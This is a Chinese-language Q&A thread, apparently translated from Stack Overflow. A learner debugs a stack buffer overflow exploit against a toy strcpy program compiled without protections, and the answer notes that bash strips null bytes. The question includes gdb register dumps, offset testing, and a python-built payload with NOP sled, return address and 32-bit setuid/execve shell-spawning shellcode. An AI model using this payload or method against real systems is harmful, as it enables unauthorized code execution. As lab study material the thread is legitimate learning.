1

Linux kali 5.6.0-kali2-amd64 #1 SMP Debian 5.6.14-1kali1 (2020-05-25) x86_64 GNU/Linux正在学习利用缓冲区溢出漏洞,所以我在这方面做得很差,所以这可能是一个简单的问题,但我在网上找不到任何有用的资源。

我正在尝试利用一个简单的程序来利用缓冲区溢出漏洞。该程序的源代码如下:

#include <stdio.h>
#include <string.h>

int main (int argc, char *argv[]){
        char buffer[64];

        if (argc < 2){
                printf("Error - Increase input!");
                return 1;
        }
        strcpy(buffer, argv[1]);
        return 0;
}

易受攻击的函数是strcpy。

我使用以下方法编译它:

gcc buf.c -o buf -fno-stack-protector -m32 -no-pie -z execstack -g

寻找偏移量

所以我通常采取的第一步是建立一个缓冲区来找到写入 EIP 的正确偏移量。

kali@kali:~/Downloads/temp$ msf-pattern_create -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

使用 gdb(安装了 peda),我运行程序并检查寄存器

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x33634132 ('2Ac3')
ECX: 0x63413163 ('c1Ac')
EDX: 0xffffd224 --> 0xffffd200 ("c1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A")
ESI: 0xf7fb2000 --> 0x1dfd6c 
EDI: 0xf7fb2000 --> 0x1dfd6c 
EBP: 0x41346341 ('Ac4A')
ESP: 0x6341315f ('_1Ac')
EIP: 0x80491d8 (<main+102>:     ret)
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491d3 <main+97>: pop    ebx
   0x80491d4 <main+98>: pop    ebp
   0x80491d5 <main+99>: lea    esp,[ecx-0x4]
=> 0x80491d8 <main+102>:        ret    
   0x80491d9 <__x86.get_pc_thunk.ax>:   mov    eax,DWORD PTR [esp]
   0x80491dc <__x86.get_pc_thunk.ax+3>: ret    
   0x80491dd <__x86.get_pc_thunk.ax+4>: xchg   ax,ax
   0x80491df <__x86.get_pc_thunk.ax+6>: nop
[------------------------------------stack-------------------------------------]
Invalid $SP address: 0x6341315f
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x080491d8 in main (argc=<error reading variable: Cannot access memory at address 0x63413163>, argv=<error reading variable: Cannot access memory at address 0x63413167>) at buf.c:13
13      }

从上面可以看到,我看不到 EIP 中的内容,使用 msf-pattern_offset 来检查 EIP 的偏移量是多少。

其他测试

后来我尝试了其他偏移量,我注意到如果缓冲区正好是 64,那么输出是

gdb-peda$ run $(python -c 'print "A"*64')

##OUTPUT##
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffd200 ('A' <repeats 48 times>)
EDX: 0xffffd230 --> 0xffffd200 ('A' <repeats 48 times>)
ESI: 0xf7fb2000 --> 0x1dfd6c 
EDI: 0xf7fb2000 --> 0x1dfd6c 
EBP: 0x0 
ESP: 0xffffd200 ('A' <repeats 48 times>)
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffd200 ('A' <repeats 48 times>)
0004| 0xffffd204 ('A' <repeats 44 times>)
0008| 0xffffd208 ('A' <repeats 40 times>)
0012| 0xffffd20c ('A' <repeats 36 times>)
0016| 0xffffd210 ('A' <repeats 32 times>)
0020| 0xffffd214 ('A' <repeats 28 times>)
0024| 0xffffd218 ('A' <repeats 24 times>)
0028| 0xffffd21c ('A' <repeats 20 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()

对此进行研究,我发现 EIP 正好在 12 个字符之后

gdb-peda$ run $(python -c 'print "A"*12 + "B"*4 + "C"*48')

#OUTPUT#
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffd200 ('C' <repeats 48 times>)
EDX: 0xffffd230 --> 0xffffd200 ('C' <repeats 48 times>)
ESI: 0xf7fb2000 --> 0x1dfd6c 
EDI: 0xf7fb2000 --> 0x1dfd6c 
EBP: 0x0 
ESP: 0xffffd200 ('C' <repeats 48 times>)
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd200 ('C' <repeats 48 times>)
0004| 0xffffd204 ('C' <repeats 44 times>)
0008| 0xffffd208 ('C' <repeats 40 times>)
0012| 0xffffd20c ('C' <repeats 36 times>)
0016| 0xffffd210 ('C' <repeats 32 times>)
0020| 0xffffd214 ('C' <repeats 28 times>)
0024| 0xffffd218 ('C' <repeats 24 times>)
0028| 0xffffd21c ('C' <repeats 20 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()

使用生成 shell 的 32 位有效负载,我的想法是开发一个漏洞利用程序,将以下缓冲区传递给程序:

python -c 'print "\x90"*12 + "\x00\xd2\xff\xff" + "\x90"*12 + "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80" + "\x90"*4'

我得到这个输出:

bash: warning: command substitution: ignored null byte in input
[Inferior 1 (process 5292) exited normally]
Warning: not running

所以我认为我很接近,但我无法弄清楚如何让它发挥作用。

对不起问题的长度

4

1 回答 1

0

bash:警告:命令替换:输入中的空字节被忽略

bash在内部使用 C 字符串,因此空字节 ( \0) 表示它的字符串结尾。尝试zsh改用(即运行zsh,然后按您所写的命令)。

于 2020-06-22T16:50:51.180 回答